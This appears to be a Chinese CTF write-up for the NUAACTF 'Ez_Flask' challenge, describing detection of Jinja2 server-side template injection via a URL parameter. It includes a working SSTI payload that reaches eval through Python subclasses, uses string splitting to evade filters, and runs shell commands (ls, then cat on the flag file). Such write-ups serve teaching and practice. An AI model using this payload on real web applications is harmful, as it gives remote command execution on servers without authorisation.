【NUAACTF】Ez_Flask

Itachi
  2021-12-27 17:57:32 2021-12-27 17:57:32 创建   2021-12-27 20:01:49 2021-12-27 20:01:49 更新      

img
按照提示随便传一个:?name=123
img
可能存在模板渲染,检测一下:?name=${2*7}
img
?name={{7*7}}
img
?name={{7*'7'}}
img
发现是 jinja2 渲染
看一下所有的类:?name={{[].__class__.__base__.__subclasses__()}}
img
可以一点一点的往下找,也可以直接写payload

1
2
3
4
5
6
7
8
9
10
11
{% for c in [].__class__.__base__.__subclasses__() %}
    {% if c.__name__ == 'catch_warnings' %}
        {% for b in c.__init__.__globals__.values() %}
            {% if b.__class__ == {}.__class__ %}
                {% if 'ev'+'al' in b.keys() %}
                    {{ b['ev'+'al']('__import__("o"+"s").popen("ls").read()') }}
                {% endif %}
            {% endif %}
        {% endfor %}
    {% endif %}
{% endfor %}

img
直接拿flag popen("cat flllll11111114aaaaaggggggggggggg").read()
img

  • 标题: 【NUAACTF】Ez_Flask
  • 作者: Itachi
  • 创建于 : 2021-12-27 17:57:32
  • 更新于 : 2021-12-27 20:01:49
  • 链接: https://blog.tarchi.top/ctf/【NUAACTF】Ez-Flask/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
 评论
此页目录
【NUAACTF】Ez_Flask